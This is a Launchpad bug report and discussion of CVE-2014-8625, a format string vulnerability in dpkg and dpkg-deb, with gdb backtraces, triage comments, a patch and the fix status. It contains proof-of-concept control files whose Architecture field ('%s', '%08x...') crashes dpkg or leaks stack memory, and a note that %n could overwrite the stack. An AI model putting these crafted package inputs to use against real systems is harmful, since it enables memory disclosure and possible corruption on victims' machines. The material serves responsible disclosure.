dpkg / dpkg-deb segfault -- possible format string bug/vuln?

Bug #1389135 reported by Joshua Rogers on 2014-11-04
260
This bug affects 1 person
Affects Status Importance Assigned to Milestone
dpkg (Debian)
Fix Released
Unknown
dpkg (Ubuntu)
Low
Unassigned

Bug Description

When building a .deb file using dpkg-deb --build, if the 'control' file inside DEBIAN/ has a % in it, it will segfault.
Example of control file:

Package: backup
Architecture: el%sion:-1
Description: script

Here's a gdb backtrace:

(gdb) run --build ./
Starting program: /root/srcs/dpkg/dpkg-1.16.1.2ubuntu7.5/dpkg-deb/dpkg-deb --build ./
warning: no loadable sections found in added symbol-file system-supplied DSO at 0x7ffff7ffa000

Program received signal SIGSEGV, Segmentation fault.
0x00007ffff763f061 in _IO_vfprintf_internal (s=<optimised out>, format=<optimised out>, ap=<optimised out>) at vfprintf.c:1630
1630 vfprintf.c: No such file or directory.
(gdb) bt
#0 0x00007ffff763f061 in _IO_vfprintf_internal (s=<optimised out>, format=<optimised out>, ap=<optimised out>) at vfprintf.c:1630
#1 0x00007ffff76670f2 in _IO_vsnprintf (
    string=0x7fffffffd560 "parsing file './/DEBIAN/control' near line 2 package 'backup:elel%sion:-1ion:-1':\n 'character `%' not allowed (only letters, digits and characters `-')' is not a valid architecture name: ",
    maxlen=<optimised out>, format=0x650c60 "parsing file './/DEBIAN/control' near line 2 package 'backup:el%sion:-1':\n '%s' is not a valid architecture name: %s", args=0x7fffffffd9a8) at vsnprintf.c:120
#2 0x00000000004175f2 in warningv (fmt=0x650c60 "parsing file './/DEBIAN/control' near line 2 package 'backup:el%sion:-1':\n '%s' is not a valid architecture name: %s", args=0x7fffffffd9a8) at ehandle.c:392
#3 0x0000000000423fa7 in parse_warn (ps=0x7fffffffddc0, fmt=0x44a680 "'%s' is not a valid architecture name: %s") at parsehelp.c:75
#4 0x000000000043b38c in f_architecture (pigp=0x7fffffffdbc0, pifp=0x7fffffffdc80, ps=0x7fffffffddc0, value=0x6651f0 "el%sion:-1", fip=0x448c40) at fields.c:189
#5 0x000000000041eb65 in pkg_parse_field (ps=0x7fffffffddc0, fs=0x7fffffffde00, parse_obj=0x7fffffffde40) at parse.c:142
#6 0x00000000004222e9 in parse_stanza (ps=0x7fffffffddc0, fs=0x7fffffffde00, parse_field=0x41e480 <pkg_parse_field>, parse_obj=0x7fffffffde40) at parse.c:478
#7 0x0000000000422843 in parsedb (filename=0x665120 ".//DEBIAN/control", flags=3, donep=0x7fffffffdea0) at parse.c:547
#8 0x0000000000404661 in check_new_pkg (dir=0x7fffffffe3e7 "./") at build.c:335
#9 0x0000000000405274 in do_build (argv=0x7fffffffe198) at build.c:436
#10 0x000000000040e566 in main (argc=3, argv=0x7fffffffe188) at main.c:206
#11 0x00007ffff761576d in __libc_start_main (main=0x40e37a <main>, argc=3, ubp_av=0x7fffffffe178, init=<optimised out>, fini=<optimised out>, rtld_fini=<optimised out>, stack_end=0x7fffffffe168) at libc-start.c:226
#12 0x00000000004025a9 in _start ()
(gdb) up 2
#2 0x00000000004175f2 in warningv (fmt=0x650c60 "parsing file './/DEBIAN/control' near line 2 package 'backup:el%sion:-1':\n '%s' is not a valid architecture name: %s", args=0x7fffffffd9a8) at ehandle.c:392
392 vsnprintf(buf, sizeof(buf), fmt, args);

Unsure if it's a vulnerability or not. If it is, could I get a CVE-ID?

Thanks

CVE References

Joshua Rogers (megamansec) wrote :

Yeah, just double checked and it does seem to be a format string vulnerability.

# cat DEBIAN/control
Package: backup
Architecture: %s
Description: script
0 0j 11:13:14 (root@limehost) /var/tmp/ok # ~/srcs/dpkg/dpkg-1.16.1.2ubuntu7.5/dpkg-deb/dpkg-deb --build ./
Segmentation fault

Thanks for taking the time to report this bug and helping to make Ubuntu better. We appreciate the difficulties you are facing, but this appears to be a "regular" (non-security) bug. I have unmarked it as a security issue since this bug does not show evidence of allowing attackers to cross privilege boundaries nor directly cause loss of data/privacy. Please feel free to report any other bugs you may find.

information type: Private Security → Public
Joshua Rogers (megamansec) wrote :

I think that this is a security bug.

If you make the 'control' file have

Architecture: %08x.%08x.%08x.%08x.%08x

and run --build, it will print five parameters from the stack.

# ./dpkg-deb --build /var/tmp/ok/
dpkg-deb: warning: parsing file '/var/tmp/ok//DEBIAN/control' near line 2 package 'backup:016b0150.00449f58.00000001.00000001.00000018':
 '�D' is not a valid architecture name: %08x.%08x.%08x.%08x.%08x
dpkg-deb: warning: parsing file '/var/tmp/ok//DEBIAN/control' near line 4 package 'backup:00449077.00449af0.00000001.00000001.01bb5790':
 missing maintainer
dpkg-deb: error: parsing file '/var/tmp/ok//DEBIAN/control' near line 4 package 'backup:00449082.00449af0.00000001.00000001.01bb5790':
 missing version

This can also be used to overwrite/rewrite the stack, using %n, too.

Joshua Rogers (megamansec) wrote :

I don't have the time/skill to try, but I'm guessing that if you can somehow actually build the package with that set as the architecture, unpacking the .deb file will also be vulnerable, which would defintley be a security-related bug.

My guess is that it _does_ exist in the unpacking phase too, since the bug seems to be triggered in lib/dpkg/parsehelp.c.

Joshua Rogers (megamansec) wrote :

Yep, I'm right.

control file:

Package: backup
Architecture: %08x.%08x.%08x.%08x.%08x\n
Description: Stuff
maintainer: Joshua Rogers
version: 1

 # dpkg-deb/dpkg-deb --build /var/tmp/ok/
dpkg-deb: warning: parsing file '/var/tmp/ok//DEBIAN/control' near line 2 package 'backup:015fd150.00449f58.00000001.00000001.0000001a\n':
 '�D' is not a valid architecture name: %08x.%08x.%08x.%08x.%08x\n
dpkg-deb: warning: ignoring 1 warning about the control file(s)

dpkg-deb: building package `backup:%08x.%08x.%08x.%08x.%08x\n' in `/var/tmp/ok.deb'.

# dpkg -i ok.deb
dpkg: warning: parsing file '/var/lib/dpkg/available' near line 11413 package 'backup:017a1e00.00431828.00000001.00000001.0000001c\n':
 '%08x.%08x.%08x.%08x.%08x\n
Version: 1
Size: 514
Description: Stuff
[....]

(full: http://pastebin.com/qetcDngk )

Unsure if signing of the .deb files happens before or after the parsing of the file -- AKA whether or not a MITM attack could be used, if the listing of architecture is done before or after checking of the signature.
I won't be testing that though.

information type: Public → Public Security
Changed in dpkg (Debian):
status: Unknown → New
Salvatore Bonaccorso (carnil) wrote :

Hi

The correct CVE ID for this should be CVE-2014-8625, see [1].

 [1] https://marc.info/?l=oss-security&m=141532206321706&w=2

Joshua Rogers (megamansec) wrote :

Fixed, my bad..

sergiomb (sergio-sergiomb) wrote :

Hi,
Let me know, when we have a dpkg release with this bug fixed, we don't have it yet, isn't it ? , to downstream on Fedora .
Thanks,

Joshua Rogers (megamansec) wrote :

Just for reference: the vulnrable function is parse_error_msg([..]), not warningv([..]).

I've attached the patch that the maintainer as reccomended for the latest version of dpkg.

The attachment "0001-libdpkg-Escape-package-and-architecture-on-control-f.patch" seems to be a patch. If it isn't, please remove the "patch" flag from the attachment, remove the "patch" tag, and if you are a member of the ~ubuntu-reviewers, unsubscribe the team.

[This is an automated message performed by a Launchpad user owned by ~brian-murray, for any issues please contact him.]

tags: added: patch
Changed in dpkg (Ubuntu):
status: New → Triaged
importance: Undecided → Medium
Changed in dpkg (Debian):
status: New → Fix Committed
Changed in dpkg (Ubuntu):
importance: Medium → Low
Changed in dpkg (Debian):
status: Fix Committed → Fix Released
To post a comment you must log in.
This report contains Public Security information  Edit
Everyone can see this security related information.

Other bug subscribers

Remote bug watches

Bug watches keep track of this bug in other bug trackers.